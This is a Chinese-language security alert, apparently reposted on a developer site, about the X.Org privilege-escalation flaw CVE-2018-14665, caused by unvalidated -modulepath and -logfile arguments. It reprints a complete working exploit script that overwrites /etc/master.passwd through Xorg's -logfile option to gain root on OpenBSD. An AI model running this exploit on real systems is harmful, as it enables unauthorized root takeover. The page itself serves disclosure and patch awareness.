漏洞预警 | CVE-2018-14665 X.Org提权漏洞

栏目: 服务器 · 发布时间: 7年前

内容简介:X.Org X服务器中验证命令行参数时出现问题,将导致任意文件覆盖,攻击者可利用这个漏洞特性实现提权(攻击者用户安装且可使用X.Org)。漏洞产生于服务器对两个参数验证不正确,分别是“-modulepath与-logfile”。其中-modulepath参数可用来指定一个不安全的路径,并跨权限执行代码,-logfile参数则可用来在文件系统中实现任意文件覆盖。

漏洞预警 | CVE-2018-14665 X.Org提权漏洞

CVE-2018-14665 X.Org存在严重的提权漏洞

X.Org X服务器中验证命令行参数时出现问题,将导致任意文件覆盖,攻击者可利用这个漏洞特性实现提权(攻击者用户安装且可使用X.Org)。

漏洞产生

漏洞产生于服务器对两个参数验证不正确,分别是“-modulepath与-logfile”。其中-modulepath参数可用来指定一个不安全的路径,并跨权限执行代码,-logfile参数则可用来在文件系统中实现任意文件覆盖。

漏洞修复

目前补丁已于25日发布,同时PoC也已经公布,用户应及时更新。

漏洞影响

Red Hat Enterprise Linux,Fedora,CentOS,Debian,Ubuntu与OpenBSD均已确认会受到此漏洞影响,其余发行版也可能受到影响。

PoC已被发布

#!/bin/sh
# local privilege escalation in X11 currently
# unpatched in OpenBSD 6.4 stable - exploit
# uses cve-2018-14665 to overwrite files as root. 
# - https://hacker.house
echo [+] OpenBSD 6.4 stable local root exploit
cd /etc
Xorg -fp 'root:$2b$08$As7rA9IO2lsfSyb7OkESWueQFzgbDfCXw0JXjjYszKa8Aklt5RTSG:0:0:daemon:0:0:Charlie &:/root:/bin/ksh' -logfile master.passwd :1 &
sleep 5
pkill Xorg
echo [-] dont forget to mv and chmod /etc/master.passwd.old 
echo [+] type 'Password1' and hit enter for root
su -

漏洞预警 | CVE-2018-14665 X.Org提权漏洞

参考链接

https://cxsecurity.com/cveshow/CVE-2018-14665

Twitter @ hackerfantastic


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

因计算机而强大

因计算机而强大

[美]西摩 佩珀特 Seymour Papert / 梁栋 / 新星出版社 / 2019-1 / 38

本书有两个中心主题—— 孩子可以轻松自如地学习使用计算机; 学习使用计算机能够改变他们学习其他知识的方式。 (前苹果公司总裁 约翰·斯卡利) 最有可能带来文化变革的就是计算机的不断普及。 计算机不仅是一个工具,它对我们的心智有着根本和深远的影响。 计算机不仅帮助我们学习 ,还帮助我们学习怎样学习。 计算机是一种调解人与人之间关系的移情对象。 一个数学的头脑......一起来看看 《因计算机而强大》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

XML、JSON 在线转换
XML、JSON 在线转换

在线XML、JSON转换工具